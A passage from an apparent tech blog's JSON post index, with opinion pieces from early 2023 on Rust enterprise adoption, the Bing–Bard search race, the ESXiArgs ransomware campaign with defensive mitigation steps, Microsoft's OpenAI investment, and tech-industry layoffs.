reshape the AI landscape by democratizing access to powerful LLMs.","title":"Meta Releases LLaMA — Open-Source AI Just Got Serious","type":"posts"},{"content":"Rust 1.67 landed a few weeks ago with refinements to async trait support and improvements to the standard library. On its own, a point release doesn\u0026rsquo;t make headlines. But zoom out and the picture is striking: Rust adoption in enterprise environments has been accelerating steadily, and 2023 is shaping up to be the year it moves from \u0026ldquo;interesting alternative\u0026rdquo; to \u0026ldquo;default choice\u0026rdquo; for a significant category of new projects. This continues momentum from the Rust Foundation formation and earlier stabilization milestones.\nThe Adoption Wave # The signals are everywhere. Microsoft has been investing heavily in Rust for Windows kernel components, motivated by the reality that roughly 70% of their CVEs stem from memory safety issues. Google is using Rust in Android, Chrome, and other critical systems. Amazon has built Firecracker — the microVM technology underpinning AWS Lambda — entirely in Rust. The Linux kernel officially started accepting Rust code, a milestone that would have seemed unthinkable five years ago.\nWhat\u0026rsquo;s changed isn\u0026rsquo;t the language itself — Rust has been excellent for years. What\u0026rsquo;s changed is the ecosystem maturity and the organizational willingness to bet on it. The crate ecosystem has hit critical mass for most common tasks. The tooling and language features have been steadily stabilized making real-world development practical. And the hiring market, while still smaller than for languages like Java or Python, has grown enough that staffing Rust teams is feasible.\nWhy Now? The Security Imperative # The strongest driver for enterprise Rust adoption is security, and specifically memory safety. The White House recently highlighted the importance of memory-safe languages as part of national cybersecurity strategy. When government agencies start talking about your programming language choice as a security concern, enterprise risk committees pay attention.\nThe numbers back it up. Study after study shows that memory safety vulnerabilities — buffer overflows, use-after-free, null pointer dereferences — account for a majority of serious security bugs in C and C++ codebases. Rust eliminates these entire categories of bugs at compile time. Not \u0026ldquo;reduces\u0026rdquo; — eliminates. For security-critical infrastructure, that\u0026rsquo;s not an incremental improvement; it\u0026rsquo;s a paradigm shift.\nI\u0026rsquo;ve been writing C and C++ for decades, and I\u0026rsquo;m the first to acknowledge that even experienced developers produce memory safety bugs. It\u0026rsquo;s not about skill — it\u0026rsquo;s about the fundamental mismatch between human attention spans and the relentless precision required to manage memory correctly across millions of lines of code over years of maintenance.\nThe Developer Experience Gap # What impresses me most about Rust\u0026rsquo;s trajectory is how the team has addressed the historically steep learning curve without compromising the language\u0026rsquo;s core guarantees. The borrow checker still enforces ownership rules strictly, but the error messages have improved dramatically. The compiler doesn\u0026rsquo;t just tell you what\u0026rsquo;s wrong — it often tells you how to fix it, with suggested code changes.\nRust 1.67\u0026rsquo;s stabilization of #[must_use] on async functions is a good example of the thoughtful evolution. Async Rust has been one of the rougher edges of the language, and each release smooths it further. The upcoming work on async traits through the async-trait crate and eventually native support will address one of the most common pain points new Rust developers encounter.\nThe IDE experience has also reached a tipping point. Rust-analyzer provides autocompletion, inline type hints, and refactoring capabilities that rival what Java developers have enjoyed with IntelliJ for years. When I pair with junior developers on Rust projects, the tooling catches mistakes fast enough that the learning curve feels manageable rather than punishing.\nWhere Rust Fits (And Where It Doesn\u0026rsquo;t) # Let me be pragmatic about where Rust makes sense today:\nStrong fit: Systems programming, network services, CLI tools, WebAssembly targets, performance-critical backend services, embedded systems, security-sensitive components. If you\u0026rsquo;re writing something that needs to be fast, correct, and reliable — Rust is probably your best option.\nGrowing fit: Web backend services (frameworks like Actix and Axum are maturing rapidly), cloud infrastructure tooling, data processing pipelines. The ecosystem isn\u0026rsquo;t as rich as Go or Java for these use cases, but it\u0026rsquo;s closing the gap.\nNot yet ideal: Rapid prototyping, data science and ML (Python\u0026rsquo;s ecosystem is still vastly superior), GUI applications (the story is improving but fragmented), anything where development speed matters more than runtime performance.\nThe key insight is that Rust isn\u0026rsquo;t trying to replace everything. It\u0026rsquo;s capturing the space where C and C++ have been the reluctant defaults — where you need performance and correctness but historically had to accept the risk of memory safety bugs as the cost of doing business.\nThe Hiring Challenge # The biggest practical barrier to Rust adoption remains talent availability. Most organizations can\u0026rsquo;t staff a Rust team as easily as a Java or Python team. But this is changing faster than many hiring managers realize.\nThe Rust community has been remarkably effective at creating learning resources. The official Rust Book is one of the best programming language introductions I\u0026rsquo;ve read. Programs like \u0026ldquo;Rustlings\u0026rdquo; provide hands-on exercises. And the community\u0026rsquo;s culture of helpfulness — particularly on the official forums and Discord — makes the onboarding experience for new Rust developers genuinely welcoming.\nI\u0026rsquo;ve seen several teams successfully transition experienced C++ or Java developers to productive Rust contributors within three to four months. The initial learning curve is real, but once developers internalize ownership concepts, their productivity often exceeds what it was in their previous language, because the compiler catches entire categories of bugs that would otherwise surface as runtime failures.\nMy Take # I started paying serious attention to Rust around 2018, and I\u0026rsquo;ll admit I was skeptical about enterprise adoption timelines. The language was clearly superior technically, but \u0026ldquo;technically superior\u0026rdquo; doesn\u0026rsquo;t always win in enterprise environments where ecosystem, tooling, and hiring matter as much as language design.\nWhat I underestimated was the security imperative. When the cost of memory safety bugs is measured in billions of dollars and national security implications, the calculus changes. Rust went from \u0026ldquo;nice to have\u0026rdquo; to \u0026ldquo;strategic necessity\u0026rdquo; faster than I expected.\nIf you\u0026rsquo;re a developer who hasn\u0026rsquo;t spent time with Rust yet, 2023 is the year to start. Not because it will replace your primary language overnight, but because understanding ownership-based memory management and Rust\u0026rsquo;s approach to correctness will make you a better programmer in any language. And if your organization is evaluating Rust for new projects — the ecosystem is ready. The question isn\u0026rsquo;t whether to adopt Rust anymore; it\u0026rsquo;s which projects to start with.\n","date":"16 February 2023","externalUrl":null,"permalink":"/posts/230216-rust-enterprise-adoption-momentum/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"With Rust 1.67 freshly shipped and adoption accelerating across major tech companies, the language is crossing the threshold from promising to essential.","title":"Rust's Enterprise Momentum — From Systems Language to Industry Standard","type":"posts"},{"content":"What a week. On Tuesday, Microsoft unveiled the new AI-powered Bing, featuring deep integration with an upgraded version of ChatGPT. The very next day, Google fired back with the announcement of Bard, their conversational AI service powered by a lightweight version of LaMDA. The AI arms race has officially moved from research labs to the products billions of people use every day.\nMicrosoft Fires First # The new Bing integrates a large language model directly into the search experience. You can ask complex questions in natural language and get synthesized, conversational answers with citations. It\u0026rsquo;s not just a chatbot bolted onto the side — Microsoft has reworked the search results page to blend traditional web results with AI-generated summaries.\nI got access to the preview today, and my first impression is that it\u0026rsquo;s genuinely useful for certain query types. Asking \u0026ldquo;explain the differences between gRPC and REST for microservice communication\u0026rdquo; returns a well-structured comparison that would normally require reading three or four articles. The citations let you verify the claims, which is crucial — because the model does occasionally get things wrong. The accuracy challenges inherent in generative AI apply equally to search integration.\nThe technical architecture is interesting. Microsoft describes it as a \u0026ldquo;Prometheus model\u0026rdquo; — essentially a fine-tuned version of GPT-4 (they\u0026rsquo;re being cagey about the exact model) with Bing\u0026rsquo;s search index integrated into the inference pipeline. The model can query the web in real-time to ground its responses in current information, which addresses one of the biggest limitations of standalone ChatGPT: its knowledge cutoff date.\nGoogle\u0026rsquo;s Response — Fast But Stumbling # Google\u0026rsquo;s Bard announcement felt rushed, and the market agreed — Alphabet\u0026rsquo;s stock dropped significantly after the reveal. The demo showed Bard giving an incorrect answer about the James Webb Space Telescope, claiming it took the first pictures of an exoplanet outside our solar system. It didn\u0026rsquo;t. That error, visible in Google\u0026rsquo;s own promotional material, undermined confidence in a product that needs to be trustworthy above all else.\nBut let\u0026rsquo;s not overreact to a demo gaffe. Google has been doing serious AI research for years. They published the original \u0026ldquo;Attention Is All You Need\u0026rdquo; transformer paper. They built BERT, which revolutionized search understanding. Google has LaMDA and other capable models that power research initiatives. The talent and technology are there — the question is whether they can ship products as aggressively as Microsoft right now.\nThe challenge for Google is existential in a way it isn\u0026rsquo;t for Microsoft. Search advertising represents the vast majority of Google\u0026rsquo;s revenue. Every AI-generated answer that satisfies a user\u0026rsquo;s query without them clicking through to a website is potentially a lost ad impression. Microsoft, with Bing\u0026rsquo;s tiny market share, has little to lose and everything to gain.\nImplications for Developers # For those of us building applications, this AI search shift has significant practical implications that go beyond just how we find Stack Overflow answers.\nSEO and content strategy changes: If search engines start answering queries directly via AI summaries, the traffic patterns to documentation sites, blogs, and technical resources will shift. This represents a fundamental shift in how content gets discovered and valued. API documentation, tutorials, and technical guides need to be structured in ways that AI models can accurately extract and cite. Structured data and clear, authoritative content become even more important.\nNew API opportunities: Both Microsoft and Google will likely offer API access to their AI-enhanced search capabilities. Imagine building applications that can query the web conversationally — customer support tools that pull current product information, research assistants that synthesize recent publications, monitoring systems that understand natural language alerts in context.\nAccuracy and trust challenges: The Bard demo error illustrates a fundamental problem. These models generate plausible-sounding text that may be factually wrong. Any application that integrates AI-generated search results needs robust verification mechanisms. We can\u0026rsquo;t just pipe model output directly to users and call it a day.\nThe Bigger Picture # What excites me most about this week isn\u0026rsquo;t either product specifically — it\u0026rsquo;s the competitive pressure. For years, search has been effectively a monopoly. Google had no serious incentive to fundamentally reinvent the experience because there was no credible threat. Microsoft just became a credible threat, and Google is responding with urgency we haven\u0026rsquo;t seen from them in the search space in over a decade.\nCompetition drives innovation, and we\u0026rsquo;re about to see a lot of innovation very quickly. Both companies will be shipping features at a pace driven by fear of falling behind rather than cautious product planning. This means faster iteration, more experimental features reaching users, and inevitably some spectacular failures along the way.\nThe infrastructure implications are also enormous. Serving AI-generated responses for search queries at Google and Bing\u0026rsquo;s scale requires massive GPU inference capacity. The cost per query goes up substantially compared to traditional search. Both companies will need to figure out how to make the economics work, which will drive innovations in model efficiency, hardware optimization, and inference architecture.\nMy Take # I\u0026rsquo;ve been using search engines since AltaVista, and this feels like the most significant shift in how search works since Google introduced PageRank. The conversational interface isn\u0026rsquo;t just a new UI skin — it changes what kinds of questions you can ask and what kinds of answers you get.\nThat said, I\u0026rsquo;m maintaining healthy skepticism. The current models hallucinate. They present wrong information with the same confidence as correct information. For technical work — debugging code, understanding API behavior, diagnosing infrastructure issues — I still want to see the primary sources. An AI summary that\u0026rsquo;s 95% accurate but wrong about one critical detail can cost you hours of debugging.\nMy prediction: within six months, AI-enhanced search will be the default experience for both Bing and Google, the accuracy will improve meaningfully, and we\u0026rsquo;ll all wonder how we tolerated the old \u0026ldquo;ten blue links\u0026rdquo; format for so long. But the journey there is going to be messy, entertaining, and occasionally infuriating.\nGrab some popcorn. The search wars are back.\n","date":"9 February 2023","externalUrl":null,"permalink":"/posts/230209-ai-search-wars-bing-bard/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft and Google are racing to integrate large language models into search, and the implications go far beyond just finding web pages.","title":"The AI Search Wars Begin — Bing Chat, Google Bard, and the Future of Finding Things","type":"posts"},{"content":"Reports are flooding in this week about a large-scale ransomware campaign targeting VMware ESXi hypervisors. Dubbed \u0026ldquo;ESXiArgs\u0026rdquo; by researchers, the attack exploits CVE-2021-21974 — a heap overflow vulnerability in the OpenSLP service that VMware patched nearly two years ago. Thousands of servers worldwide have already been hit, with CERT-FR among the first to issue warnings. The scale is staggering, and the root cause is depressingly familiar.\nThe Vulnerability That Wouldn\u0026rsquo;t Die # CVE-2021-21974 affects ESXi versions 6.5, 6.7, and 7.0 where the OpenSLP service is enabled and accessible on port 427. VMware released patches in February 2021. That\u0026rsquo;s two full years of patch availability, and yet Shodan scans reveal thousands of internet-facing ESXi instances still running vulnerable configurations.\nI wish I could say this surprises me, but after three decades in this industry, the pattern is achingly predictable. Hypervisors occupy an awkward position in many organizations\u0026rsquo; patch management strategies. They\u0026rsquo;re \u0026ldquo;infrastructure\u0026rdquo; — not application servers that get regular update cycles, and not network equipment managed by a separate team. They sit in a gap where responsibility is ambiguous, and patching requires VM migration or downtime that nobody wants to schedule.\nThe attack vector is particularly nasty because it targets the hypervisor layer directly. Once an attacker compromises ESXi, they can encrypt the virtual disk files (.vmdk), swap files, and configuration files of every VM running on that host. One compromised hypervisor can take down dozens of production workloads simultaneously.\nAnatomy of the Attack # The ESXiArgs ransomware follows a relatively straightforward attack chain. The attacker exploits the SLP vulnerability to gain code execution on the ESXi host, then deploys an encryption routine that targets specific file extensions associated with virtual machines. The ransom note demands Bitcoin payment — typically around 2 BTC — with a unique wallet address per victim.\nWhat\u0026rsquo;s notable about this campaign is its automation. The attackers aren\u0026rsquo;t carefully selecting targets or moving laterally through networks. They\u0026rsquo;re scanning the internet for exposed SLP services on port 427 and firing the exploit at anything that responds. It\u0026rsquo;s industrialized exploitation at scale.\nThe encryption implementation has some interesting characteristics. Early analysis suggests it encrypts small files completely but only encrypts portions of larger files — specifically the beginning and end sections with a configurable chunk size. This means that in some cases, partial data recovery might be possible from the unencrypted middle sections of large VMDK files. Several community members are already working on recovery scripts, though success depends heavily on the specific encryption parameters used.\nWhy This Keeps Happening # The uncomfortable truth is that this incident exposes systemic failures in how organizations manage infrastructure security. Let me count the ways:\nPatch management gaps: Two years is an eternity in security terms. If your hypervisors haven\u0026rsquo;t been patched in two years, what else hasn\u0026rsquo;t been patched? The problem often stems from treating hypervisors as \u0026ldquo;set and forget\u0026rdquo; infrastructure rather than actively managed systems.\nUnnecessary exposure: There is almost no legitimate reason for ESXi\u0026rsquo;s SLP service to be accessible from the internet. Proper network segmentation would have prevented this attack entirely, regardless of patch status. Management interfaces for hypervisors should never be internet-facing — full stop.\nMonitoring blind spots: Many organizations have robust monitoring for their VMs but minimal visibility into what\u0026rsquo;s happening at the hypervisor level. ESXi hosts often don\u0026rsquo;t run endpoint detection agents, and their logs may not feed into the central SIEM.\nBackup architecture: If your backups live on datastores connected to the same ESXi host, they\u0026rsquo;re encrypted too. The 3-2-1 backup rule exists for exactly this scenario — three copies, two different media types, one offsite.\nPractical Response Steps # If you\u0026rsquo;re running VMware ESXi in your environment, here\u0026rsquo;s what I\u0026rsquo;d recommend doing this week:\nFirst, audit your ESXi inventory. Know exactly which versions you\u0026rsquo;re running and their patch levels. If you have any instances exposed to the internet, isolate them immediately — before patching, before anything else.\nSecond, disable the SLP service if you\u0026rsquo;re not using it. On ESXi, you can do this via the command line:\n/etc/init.d/slpd stop esxcli network firewall ruleset set -r CIMSLP -e 0 Third, review your network segmentation. ESXi management interfaces should be on dedicated management VLANs with strict access controls. If you can reach your hypervisor management plane from a user workstation, your segmentation needs work.\nFourth, verify your backups. Not \u0026ldquo;check that the backup job shows green\u0026rdquo; — actually test a restore. Make sure at least one copy of your VM backups is stored independently of the ESXi infrastructure.\nMy Take # This ransomware campaign isn\u0026rsquo;t sophisticated. It exploits a known vulnerability with an available patch, targets systems that shouldn\u0026rsquo;t be internet-accessible in the first place, and uses a relatively simple encryption approach. And yet it\u0026rsquo;s affecting thousands of organizations.\nThe lesson isn\u0026rsquo;t technical — it\u0026rsquo;s organizational. We need to treat hypervisor infrastructure with the same security rigor we apply to any other critical system. That means regular patching cycles, network segmentation, monitoring, and tested backup procedures. None of this is new advice, but clearly it bears repeating.\nIf there\u0026rsquo;s a silver lining, it\u0026rsquo;s that this incident might finally get some organizations to take hypervisor security seriously. But I suspect that in another two years, we\u0026rsquo;ll be having a very similar conversation about a different CVE. I\u0026rsquo;d love to be wrong about that.\n","date":"2 February 2023","externalUrl":null,"permalink":"/posts/230202-esxiargs-ransomware-vmware-esxi/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A massive ransomware campaign is exploiting a two-year-old VMware ESXi vulnerability, and the scale of unpatched systems is alarming.","title":"ESXiArgs Ransomware — A Wake-Up Call for VMware Infrastructure","type":"posts"},{"content":"This week, Microsoft confirmed what had been rumored for weeks: a multiyear, multibillion-dollar investment in OpenAI, reported to be around $10 billion. As someone who\u0026rsquo;s been building on Azure since its early days, this isn\u0026rsquo;t just another enterprise partnership announcement. This is Microsoft fundamentally redefining what a cloud platform means.\nThe Strategic Chess Move # Let\u0026rsquo;s put this in perspective. Cloud computing has been a three-horse race for years — AWS, Azure, and Google Cloud — with each provider differentiating mainly on pricing, service breadth, and enterprise relationships. Microsoft just changed the game by making AI capabilities a core competitive moat rather than a feature checkbox.\nThe investment extends their existing relationship that started in 2019, but the scale is different this time. We\u0026rsquo;re talking about exclusive cloud provider status for OpenAI\u0026rsquo;s workloads, integration of OpenAI models into Azure\u0026rsquo;s AI services, and likely deep embedding of GPT technology across the entire Microsoft product suite. If you\u0026rsquo;re running workloads on Azure, you\u0026rsquo;re about to get access to capabilities that simply won\u0026rsquo;t be available on competing platforms — at least not in the same integrated form.\nWhat This Means for Azure Developers # For those of us building on Azure, the immediate practical impact centers around the Azure OpenAI Service, which has been in limited preview. Expect this to become generally available much faster now. The key advantage? You get GPT model access with Azure\u0026rsquo;s enterprise compliance, networking, and identity management baked in.\nI\u0026rsquo;ve been experimenting with the preview API for a few weeks now, and the integration is already surprisingly smooth. You authenticate with your existing Azure AD credentials, the endpoints sit inside your virtual network, and the data processing agreements align with what enterprises already have in place for Azure services. That last point matters enormously — I\u0026rsquo;ve seen multiple projects stall because legal teams couldn\u0026rsquo;t approve sending data to OpenAI\u0026rsquo;s public API.\nThe pricing model will be interesting to watch. Right now, OpenAI charges per token through their API. Microsoft will likely bundle AI capabilities into existing Azure tiers, which could dramatically change the economics of building AI-powered applications.\nThe Broader Industry Impact # What I find most significant is the signal this sends to the rest of the industry. Google has been developing large language models internally — their PaLM and LaMDA models are impressive — but they\u0026rsquo;ve been cautious about public deployment. Amazon has been relatively quiet on the generative AI front compared to its competitors. This investment forces both to accelerate their strategies.\nFor developers and architects, the message is clear: AI integration is moving from \u0026ldquo;nice-to-have experiment\u0026rdquo; to \u0026ldquo;core platform capability\u0026rdquo; across all major clouds. If you haven\u0026rsquo;t started evaluating how large language models fit into your application architecture, the window for leisurely exploration is closing.\nThe open-source community response will also be worth watching. There\u0026rsquo;s a legitimate concern that the most capable AI models are becoming increasingly concentrated among well-funded companies. The compute costs alone for training models at GPT\u0026rsquo;s scale run into hundreds of millions of dollars — a barrier that effectively excludes all but the largest players.\nInfrastructure Implications # From an infrastructure perspective, this investment will drive significant changes in how Azure\u0026rsquo;s data centers are configured. Training and serving large language models requires specialized GPU clusters, high-bandwidth interconnects, and enormous amounts of memory. Microsoft has already been building out this infrastructure, but $10 billion accelerates the timeline considerably.\nFor those of us designing systems, this means thinking about AI inference as a first-class infrastructure concern. Latency to the model endpoint matters. Data locality matters. Batching and caching strategies for model calls need the same attention we\u0026rsquo;ve historically given to database query optimization.\nI\u0026rsquo;ve already started sketching out patterns for how to integrate LLM calls into microservice architectures without creating performance bottlenecks. The key insight is treating model inference like any other external service dependency — with circuit breakers, fallbacks, and graceful degradation.\nMy Take # I\u0026rsquo;ve been through enough technology cycles to be skeptical of \u0026ldquo;this changes everything\u0026rdquo; narratives. But this one feels different. The investment isn\u0026rsquo;t speculative — ChatGPT has already demonstrated real utility that non-technical users can grasp immediately. Microsoft isn\u0026rsquo;t betting on a future that might not arrive; they\u0026rsquo;re doubling down on technology that\u0026rsquo;s already here.\nMy practical advice: start building internal expertise now. Set up an Azure OpenAI Service instance if you can get access, experiment with prompt engineering, and figure out where in your application stack natural language understanding actually solves real problems. Not every feature needs AI, but the features that do will become table stakes remarkably quickly.\nThe cloud wars just got a lot more interesting, and for once, it\u0026rsquo;s not about who has the cheapest virtual machines.\n","date":"26 January 2023","externalUrl":null,"permalink":"/posts/230126-microsoft-openai-ten-billion-investment/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft’s massive investment in OpenAI signals a fundamental shift in how cloud providers compete — and it’s not just about chatbots.","title":"Microsoft's $10 Billion OpenAI Bet — What It Means for the Cloud and AI Landscape","type":"posts"},{"content":"Multiple outlets including Semafor and Bloomberg are reporting that Microsoft is in advanced talks to invest $10 billion in OpenAI, the company behind ChatGPT and GPT-3. If the deal goes through as reported, it would be one of the largest investments in AI history and would firmly position Microsoft at the center of the generative AI revolution.\nThis isn\u0026rsquo;t coming from nowhere. Microsoft has been building its relationship with OpenAI since 2019, when it invested $1 billion and became OpenAI\u0026rsquo;s exclusive cloud provider. Azure powers OpenAI\u0026rsquo;s training and inference infrastructure. GitHub Copilot, powered by OpenAI\u0026rsquo;s Codex model, is already one of the most tangible AI developer tools on the market. But a $10 billion investment? That\u0026rsquo;s a different magnitude entirely.\nThe Strategic Logic # To understand why Microsoft would make this bet, look at the cloud landscape. AWS dominates with roughly 32% market share. Azure is second at around 22%. Google Cloud trails at about 10%. For years, these three have competed primarily on infrastructure features, pricing, and enterprise relationships.\nAI changes that competitive dynamic. If generative AI becomes a foundational layer that developers and businesses build on — and the explosive adoption of ChatGPT suggests it might — then the cloud provider with the best AI capabilities has a powerful differentiator. It\u0026rsquo;s not just about virtual machines and storage anymore; it\u0026rsquo;s about who has the most capable AI models and the best tools to deploy them.\nMicrosoft has been threading this needle carefully. Azure already offers OpenAI\u0026rsquo;s models through the Azure OpenAI Service, giving enterprise customers access to GPT-3 and other models with Azure\u0026rsquo;s security, compliance, and networking infrastructure. A deeper investment in OpenAI would strengthen this exclusive arrangement and potentially give Microsoft early or preferred access to future models.\nFrom Microsoft\u0026rsquo;s perspective, this is also about Office, Teams, Bing, and every other product in their portfolio. Imagine Word that can draft documents from bullet points, Excel that can generate formulas from natural language descriptions, or Teams that can summarize meetings and extract action items. These aren\u0026rsquo;t hypothetical — they\u0026rsquo;re the obvious applications of the technology OpenAI has demonstrated.\nWhat This Means for Developers # For the developer ecosystem, the implications are significant:\nAzure becomes the AI platform. If you want to build on OpenAI\u0026rsquo;s models with enterprise-grade infrastructure, Azure is the path. This could be a meaningful driver of cloud migration for companies that have been AWS-centric but want access to the best generative AI capabilities.\nGitHub Copilot is just the beginning. Microsoft owns GitHub, and OpenAI\u0026rsquo;s technology already powers Copilot. Expect this to deepen dramatically — not just code completion, but code review, documentation generation, test writing, and potentially architectural suggestions. The developer experience could change fundamentally.\nThe API economy around LLMs will explode. OpenAI\u0026rsquo;s API pricing is already accessible enough for startups to build on. With Microsoft\u0026rsquo;s deep pockets and distribution infrastructure behind it, we\u0026rsquo;re likely to see an entire ecosystem of AI-powered applications emerge — and the tools, frameworks, and best practices for building with LLMs will become critical developer skills.\nCompetition will intensify. Google has been notoriously cautious about releasing its AI capabilities publicly, despite having arguably comparable or superior technology (remember, the Transformer paper came from Google). This investment will likely force Google\u0026rsquo;s hand. Amazon is reportedly working on its own LLM strategy. The next year will see rapid expansion as multiple AI platforms compete for developer mindshare and enterprise adoption.\nThe Valuation Question # The reported deal structure is interesting. OpenAI was originally founded as a nonprofit, then created a \u0026ldquo;capped-profit\u0026rdquo; subsidiary. The reported $29 billion valuation implies enormous expected revenue from AI services. Right now, OpenAI\u0026rsquo;s revenue reportedly comes from API access and is growing rapidly, but $29 billion is a bet on future dominance, not current financials.\nThis raises questions about the sustainability of the current AI economics. Training large language models is extraordinarily expensive — GPT-3\u0026rsquo;s training reportedly cost millions in compute. GPT-4, whenever it arrives, will likely cost significantly more. The inference costs of running ChatGPT for millions of free users aren\u0026rsquo;t trivial either.\nMicrosoft\u0026rsquo;s Azure infrastructure partially solves this by providing compute at cost (or below cost, as a strategic investment). But the broader question remains: what\u0026rsquo;s the business model that justifies a $29 billion valuation? Enterprise API subscriptions? AI-powered features in Microsoft 365? A fundamental reshaping of search with AI? Perhaps all of the above.\nThe Open Source Wild Card # There\u0026rsquo;s another dimension worth watching: the open-source AI ecosystem. While OpenAI\u0026rsquo;s name includes \u0026ldquo;open,\u0026rdquo; their recent models have been increasingly closed. GPT-3 and ChatGPT are accessible only through APIs, not as downloadable models.\nMeanwhile, open-source alternatives are developing rapidly. Stability AI\u0026rsquo;s Stable Diffusion demonstrated that open-source models can compete with and even exceed proprietary ones in some domains. Meta released OPT-175B, and other open-weight models are emerging from various research labs. Hugging Face continues to build the infrastructure for open AI development.\nThe tension between proprietary AI (OpenAI/Microsoft) and open-source alternatives will be one of the defining dynamics of the next few years. For developers, this tension is actually beneficial — it means competition, choice, and continued innovation regardless of which approach wins.\nMy Take # Microsoft is making a massive, calculated bet that AI is the next platform shift — comparable to mobile, cloud, or the web itself. Given what we\u0026rsquo;ve seen from ChatGPT, I find it hard to argue that they\u0026rsquo;re wrong about the technology\u0026rsquo;s potential.\nWhat I\u0026rsquo;m watching carefully is the consolidation risk. If the most capable AI models are controlled by a handful of hyperscalers who also control the cloud infrastructure needed to run them, that creates a concentration of power that should give us pause. The best outcome for developers and users is one where capable AI models are available from multiple providers, including open-source options, with real competition on quality, pricing, and terms.\nFor now, the practical takeaway for developers is simple: invest time in understanding LLMs, prompt engineering, and how to build applications with AI capabilities. Regardless of who wins the corporate chess match, the technology is here to stay, and the demand for engineers who know how to work with it is going to be enormous.\nThe next few months will tell us a lot about where this is heading. A confirmed $10 billion investment would be a defining moment for the AI industry — and for the cloud landscape that underpins it.\n","date":"19 January 2023","externalUrl":null,"permalink":"/posts/230119-microsoft-openai-investment/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Reports indicate Microsoft is investing $10 billion in OpenAI. What this mega-deal means for the cloud landscape, AI development, and the rest of the industry.","title":"Microsoft's Reported $10 Billion OpenAI Bet — The Cloud AI Race Heats Up","type":"posts"},{"content":"The new year has barely started, and the tech layoff announcements are already piling up. Amazon confirmed 18,000 job cuts — the largest in the company\u0026rsquo;s history. Salesforce is cutting roughly 8,000 employees, about 10% of its workforce. These follow the November waves from Meta (11,000) and Twitter (roughly half the company). According to layoffs.fyi, over 150,000 tech workers were laid off in 2022, and January 2023 is already adding to that count rapidly.\nHaving lived through the dot-com bust, the 2008 financial crisis, and now this — I want to offer some perspective that goes beyond the headlines.\nWhat\u0026rsquo;s Actually Driving This # The narrative in the press is straightforward: \u0026ldquo;tech companies over-hired during the pandemic boom and are now correcting.\u0026rdquo; That\u0026rsquo;s partially true, but the reality is more nuanced.\nDuring 2020-2021, several things happened simultaneously. Interest rates were near zero, making capital essentially free. Digital adoption accelerated dramatically as the world went remote. Tech companies saw their growth metrics surge and, quite reasonably at the time, hired aggressively to capitalize on what they believed was a permanent shift.\nThe correction we\u0026rsquo;re seeing now is driven by multiple factors converging:\nRising interest rates: The Fed\u0026rsquo;s aggressive rate hikes have made capital expensive again. For growth-stage companies that were burning cash to acquire users, the math has changed fundamentally. Even profitable companies are feeling pressure as the era of cheap money ends.\nRevenue slowdown: Digital advertising — the core business model for Meta, Google, and many others — has slowed as the pandemic-era digital surge normalized and economic uncertainty made advertisers more cautious.\nEfficiency pressure: There\u0026rsquo;s increasing pressure from investors to focus on profitability over growth. Mark Zuckerberg has literally called 2023 the \u0026ldquo;Year of Efficiency.\u0026rdquo; After years of \u0026ldquo;grow at all costs,\u0026rdquo; the pendulum is swinging toward margins and operational discipline.\nCopycat dynamics: There\u0026rsquo;s an uncomfortable truth here: once a few major companies announce layoffs, it becomes easier for others to follow. It provides cover for workforce reductions that leadership may have been considering anyway. \u0026ldquo;Everyone is doing it\u0026rdquo; is a powerful normalizer.\nThe Developer Market Reality # Let me be clear: the tech job market has cooled, but it hasn\u0026rsquo;t collapsed. There\u0026rsquo;s an enormous difference between the current environment and the dot-com bust, where entire business models evaporated overnight and many companies simply ceased to exist.\nWhat we\u0026rsquo;re seeing is a correction from an abnormally hot market. In 2021-2022, the market was so tilted toward candidates that companies were offering signing bonuses, fully remote positions, and inflated compensation packages just to compete. That was an anomaly, not a baseline.\nThe companies doing layoffs are, for the most part, still enormously profitable or well-funded. Amazon\u0026rsquo;s core business is healthy. Salesforce isn\u0026rsquo;t going anywhere. These are cost optimization moves, not existential crises.\nThat said, the impact on affected individuals is real and significant. \u0026ldquo;The market is still okay on average\u0026rdquo; is cold comfort when you\u0026rsquo;re the one whose position was eliminated. The emotional and financial stress of a layoff is genuine regardless of macro conditions.\nWhat Areas Are More Resilient # Not all engineering roles are equally affected. From what I\u0026rsquo;m seeing across my network and in public reporting:\nMore affected: Recruiting (obviously, since you need fewer recruiters when you\u0026rsquo;re not hiring), some product management roles, roles in experimental or moonshot divisions, and unfortunately some diversity and inclusion programs.\nMore resilient: Core infrastructure and platform engineering, security, data engineering, and roles directly tied to revenue-generating products. Cloud infrastructure demand continues to grow. AI/ML teams, if anything, are expanding — the ChatGPT moment has every company scrambling to integrate AI capabilities.\nStrong demand: DevOps and SRE roles remain in high demand. The infrastructure underlying all these services still needs to be built, maintained, and improved. Cybersecurity continues to face a massive talent shortage that shows no signs of easing.\nLessons for Engineers # A few thoughts for developers navigating this environment:\nDiversify your skills. Full-stack engineers who can work across the stack and understand infrastructure are more versatile when headcount is constrained. If you\u0026rsquo;ve been meaning to learn Kubernetes, brush up on cloud architecture, or understand CI/CD pipelines more deeply — now is a good time.\nBuild your network before you need it. The developers who land quickly after layoffs are typically the ones with strong professional networks. Contribute to open source, participate in communities, maintain relationships with former colleagues. These connections matter more than any job board.\nSave aggressively. The tech compensation boom of the past few years provided an opportunity to build significant financial cushions. If you haven\u0026rsquo;t been taking advantage of that, start now. An emergency fund that covers 6-12 months of expenses turns a layoff from a crisis into an inconvenience.\nFocus on fundamentals. Frameworks and specific tools come and go. Understanding data structures, system design, distributed systems concepts, and how to write clean, maintainable code — these skills compound over decades. They also tend to be what separates candidates in a more selective hiring environment.\nMy Take # I\u0026rsquo;ve been through enough of these cycles to know that the tech industry will be fine in the aggregate. The demand for software isn\u0026rsquo;t decreasing — if anything, it\u0026rsquo;s accelerating as every industry continues to digitize. What\u0026rsquo;s changing is the financial environment that allowed companies to hire ahead of demand and tolerate high operational costs.\nWhat concerns me more than the layoffs themselves is the potential loss of institutional knowledge and the impact on engineering culture. When you lay off 10% of a company, you don\u0026rsquo;t just lose headcount — you lose the people who know why that system was built that way, who carry the context that makes large codebases manageable, who mentor junior engineers.\nFor those affected: this is a setback, not a dead end. The market for good engineers remains strong. Take the time you need, lean on your network, and remember that your worth isn\u0026rsquo;t defined by your employment status at any given moment.\nFor those not affected: check in on your former colleagues. Make introductions. Share job openings. The tech community is strongest when we support each other through the downturns, not just celebrate together during the booms.\n","date":"12 January 